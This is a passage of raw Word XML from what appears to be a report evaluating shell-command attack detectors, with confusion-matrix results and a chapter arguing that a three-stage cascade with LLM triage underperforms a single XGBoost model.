    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [1340, 96, 64, 415]; F1 0.838, Recall 0.866, FPR 0.067.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False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 64): {'honeypot': 64}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 96): {'bash_history': 72, 'commandlinefu': 24}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nano u.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>31m&gt;&gt;&gt;&gt; Server Gasit incepem Testele \033[1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/gisdfoewrsfdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Zsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dpigs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cp ~/.functions bash/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cross-model contrast to write up:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> compare which commands XGBoost misses that the CNN catches and vice-versa — the CNN reads raw char motifs (catches obfuscated/adjacent payloads), XGBoost reads engineered conjunctions (catches family co-occurrence). The disagreement set is exactly what the cascade (8.4) and the LLM triage (bonus) are designed to resolve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.4 — The hybrid behavioural cascade: does the architecture earn its complexity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch8_4_cascade_findings.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> is generated by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch8_4_cascade.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">and reports what the cascade </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>scores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>. This chapter reports what each stage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, using the per-stage audit in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch8_4_cascade_forensics.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_4_cascade_forensics.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>), which fits the two component models</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>once and then derives every routing variant from the cached stage-1 anomaly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>scores and stage-2 probabilities. The routing rule is deterministic given</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>those two arrays, so the ablations below are exact reproductions of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CascadeDetector.predict_with_trace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>, not re-runs with different seeds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The verdict first</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The cascade is the architecture the assignment recommends: a cheap unsupervised filter clears obvious benign traffic, a supervised model classifies the rest, and an LLM arbitrates the residue. We built it, measured it, and it does not work — not marginally, and not for the reason we expected.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Dataset 1 (n = 3,049)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F1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recall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FPR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tn / fp / fn / tp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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XGBoost-hybrid alone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0.8761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0.8755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0.8766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0.0415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2192 / 95 / 94 / 668</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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stage 1 + 2 (no arbitration)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0.8737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0.8760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0.8714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0.0411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2193 / 94 / 98 / 664</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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stage 2 + 3 (no pre-filter)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0.8716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0.9088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0.8373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0.0280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2223 / 64 / 124 / 638</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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full three-stage cascade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0.8685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0.9083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0.8320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0.0280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2223 / 64 / 128 / 634</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 11. Dataset 1 - cascade configurations vs. the single best model: F1, precision, recall, FPR, and confusion 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Dataset 2 (n = 1,915)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F1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recall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FPR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tn / fp / fn / tp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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XGBoost-hybrid alone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0.8482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0.8508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0.8455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0.0494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1365 / 71 / 74 / 405</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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stage 1 + 2 (no arbitration)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0.8463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0.8535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0.8392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0.0481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1367 / 69 / 77 / 402</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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stage 2 + 3 (no pre-filter)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0.8415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0.8830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0.8038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0.0355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1385 / 51 / 94 / 385</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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full three-stage cascade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0.8396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0.8863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0.7975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0.0341</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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1387 / 49 / 97 / 382</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 12. Dataset 2 - cascade configurations vs. the single best model: F1, precision, recall, FPR, and confusion counts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The ordering is identical on both corpora and it is the worst possible one: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>every stage we add to the supervised model makes the system worse, and the full cascade is the weakest configuration of the four.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Removing stage 1 improves it. Removing stage 3 improves it. Removing both — which is to say, deleting the cascade and shipping the single model — improves it most.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The cascade's one apparent win is precision: 0.9083 against the hybrid's 0.8755 on Dataset 1, with the false-alarm rate falling from 4.15% to 2.80%. That is a 33% relative reduction in analyst workload from false positives, and it is the number a charitable write-up would lead with. The rest of this chapter is the argument for why it should not.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B4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